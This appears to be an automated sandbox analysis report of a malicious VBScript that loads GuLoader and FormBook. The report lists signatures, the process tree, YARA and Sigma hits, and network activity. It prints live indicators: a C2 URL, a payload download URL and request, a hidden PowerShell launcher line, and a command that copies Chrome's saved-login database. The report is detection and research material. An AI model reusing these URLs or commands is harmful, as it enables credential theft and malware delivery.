
Windows Analysis Report MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name: MTIR22024323_0553381487_20220112120005.vbs
Analysis ID: 552589
MD5: 564601676bee71f5f61a44ef170d92a6
SHA1: 76fca984dab2358e66524172e04a3528f33d8e18
SHA256: 5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags: vbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7072 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 5244 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 4540 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 6256 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5460 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • cmstp.exe (PID: 3504 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
            • cmd.exe (PID: 5276 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6392 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • explorer.exe (PID: 6664 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ieinstal.exe (PID: 3232 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
          • ieinstal.exe (PID: 6084 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}

Threatname: GuLoader

{"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started; Author: Nik Seetharaman; Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 3504, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5276
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64-encoded command omitted]
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process started; Author: frack113; Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64-encoded command omitted]
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132865880383508564.6420.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp; Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}
Multi AV Scanner detection for submitted file
Source: MTIR22024323_0553381487_20220112120005.vbs; ReversingLabs: Detection: 12%
Yara detected FormBook
Source: Yara match; File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: unknown; HTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

      Networking:

Potential malicious VBS script found (has network functionality)
Source: Initial file: BinaryStream.SaveToFile Landsk, adSaveCreateOverWrite
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.jewelrystore1.com/wk3t/
Source: Malware configuration extractor; URLs: https://www.wizumiya.co.jp/html/user_da
Source: Joe Sandbox View; ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: www.wizumiya.co.jp | Cache-Control: no-cache
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown; Network traffic detected: HTTP traffic on port 49775 -> 443
Source: explorer.exe, 00000022.00000000.712071572.00000000049DC000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmp; String found in binary or memory: http://crl.microsoft
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp; String found in binary or memory: http://fahrschule-heli.at/bin_WUOAiR166.bin
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.microsoft.
Source: powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmp; String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp; String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmp; String found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
Source: unknown; DNS traffic detected: queries for: www.wizumiya.co.jp

      E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cmstp.exe; Dropped file: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini
Source: C:\Windows\SysWOW64\cmstp.exe; Dropped file: C:\Users\user\AppData\Roaming\O118090C\O11logrv.ini
Malicious sample detected (through community Yara rule)
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 7149
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 7149
Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00D1CDF8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00D1DED8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07617E00
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07617E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD2EF7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCD616
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED26E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD1FF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCD466
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1841F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD25DD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32581
